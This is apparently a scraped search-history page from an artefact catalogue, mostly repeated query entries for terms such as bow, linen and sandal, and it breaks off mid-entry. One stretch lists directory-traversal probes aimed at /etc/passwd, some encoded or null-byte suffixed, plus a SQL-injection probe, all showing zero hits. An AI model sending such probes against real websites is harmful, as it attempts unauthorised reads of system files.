(hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for garland - (hits/occ.: 2)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for - (hits/occ.: 0)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for garland - (hits/occ.: 2)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for 0 - (hits/occ.: 32)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for mask - (hits/occ.: 1)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for 0 - (hits/occ.: 32)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for mask - (hits/occ.: 1)Results List for anubis - (hits/occ.: 5)Results List for 0 - (hits/occ.: 32)Results List for 0 - (hits/occ.: 32)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for 0 - (hits/occ.: 32)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for boat - (hits/occ.: 33)Results List for shield - (hits/occ.: 8)Results List for 1 - (hits/occ.: 145)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for seal - (hits/occ.: 16)Results List for anubis - (hits/occ.: 5)Results List for seal - (hits/occ.: 16)Results List for seal - (hits/occ.: 16)Results List for shield - (hits/occ.: 8)Results List for 1 - (hits/occ.: 145)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for jar - (hits/occ.: 61)Results List for - (hits/occ.: 0)Results List for glove - (hits/occ.: 10)Results List for shield - (hits/occ.: 8)Results List for seal - (hits/occ.: 16)Results List for 0 - (hits/occ.: 32)Results List for shield - (hits/occ.: 8)Results List for mask - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for gauntlet - (hits/occ.: 15)Results List for - (hits/occ.: 0)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for garland - (hits/occ.: 2)Results List for gauntlet - (hits/occ.: 15)Results List for bouquet - (hits/occ.: 6)Results List for food - (hits/occ.: 49)Results List for shield - (hits/occ.: 8)Results List for /etc/passwd - (hits/occ.: 0)Results List for %2fetc%2fpasswd - (hits/occ.: 0)Results List for /etc/passwd%00 - (hits/occ.: 0)Results List for %2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../etc/passwd - (hits/occ.: 0)Results List for ..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../../../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../../../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../../../../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../../../../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../../../../../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../../../../../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../../../../../../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../../../../../../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for ../../../../../../../../../etc/passwd - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd - (hits/occ.: 0)Results List for ../../../../../../../../../etc/passwd%00 - (hits/occ.: 0)Results List for ..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00 - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for %270%3d1 - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for shield - (hits/occ.: 8)Results List for - (hits/occ.: 0)Results List for linen - (hits/occ.: 79)Results List for scarab - (hits/occ.: 15)Results List for basket - (hits/occ.: 128)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for wreath - (hits/occ.: 1)Results List for fruit - (hits/occ.: 9)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for anubis - (hits/occ.: 5)Results List for bow - (hits/occ.: 14)Results List for scarab - (hits/occ.: 15)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for gauntlet - (hits/occ.: 15)Results List for garland - (hits/occ.: 2)Results List for glass - (hits/occ.: 28)Results List for bouquet - (hits/occ.: 6)Results List for glove - (hits/occ.: 10)Results List for basket - (hits/occ.: 128)Results List for shield - (hits/occ.: 8)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for seal - (hits/occ.: 16)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 14)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 14)Results List for bow - (hits/occ.: 59)Results List for - (hits/occ.: 0)Results List for mask - (hits/occ.: 1)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for scarab - (hits/occ.: 15)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for glass - (hits/occ.: 28)Results List for bouquet - (hits/occ.: 6)Results List for loin - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for scarab - (hits/occ.: 15)Results List for wreath - (hits/occ.: 1)Results List for sandal - (hits/occ.: 25)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for mask - (hits/occ.: 1)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for glass - (hits/occ.: 28)Results List for glass - (hits/occ.: 28)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for loin - (hits/occ.: 25)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for basket - (hits/occ.: 128)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for loin - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for jar - (hits/occ.: 61)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 14)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for throne - (hits/occ.: 3)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for scarab - (hits/occ.: 15)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for shield - (hits/occ.: 8)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for garland - (hits/occ.: 2)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bouquet - (hits/occ.: 6)Results List for glove - (hits/occ.: 10)Results List for sandal - (hits/occ.: 25)Results List for gauntlet - (hits/occ.: 15)Results List for scarab - (hits/occ.: 15)Results List for shield - (hits/occ.: 8)Results List for anubis - (hits/occ.: 5)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for garland - (hits/occ.: 2)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for wreath - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for basket - (hits/occ.: 128)Results List for seal - (hits/occ.: 16)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for basket - (hits/occ.: 128)Results List for scarab - (hits/occ.: 15)Results List for mask - (hits/occ.: 1)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for loin - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for basket - (hits/occ.: 128)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for basket - (hits/occ.: 128)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for jar - (hits/occ.: 61)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for bouquet - (hits/occ.: 6)Results List for bow - (hits/occ.: 14)Results List for sandal - (hits/occ.: 25)Results List for jar - (hits/occ.: 61)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for food - (hits/occ.: 49)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for mask - (hits/occ.: 1)Results List for linen - (hits/occ.: 79)Results List for glass - (hits/occ.: 28)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for fruit - (hits/occ.: 9)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for scarab - (hits/occ.: 15)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for glove - (hits/occ.: 10)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for sandal - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for mask - (hits/occ.: 1)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for glass - (hits/occ.: 28)Results List for food - (hits/occ.: 49)Results List for sandal - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for loin - (hits/occ.: 25)Results List for sandal - (hits/occ.: 25)Results List for food - (hits/occ.: 49)Results List for anubis - (hits/occ.: 5)Results List for loin - (hits/occ.: 25)Results List for - (hits/occ.: 0)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for loin - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for shield - (hits/occ.: 8)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for arrow - (hits/occ.: 29)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 14)Results List for arrow - (hits/occ.: 29)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for linen - (hits/occ.: 79)Results List for sandal - (hits/occ.: 25)Results List for arrow - (hits/occ.: 29)Results List for sandal - (hits/occ.: 25)Results List for anubis - (hits/occ.: 5)Results List for anubis - (hits/occ.: 5)Results List for sandal - (hits/occ.: 25)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 59)Results List for bow - (hits/occ.: 14)Results List for 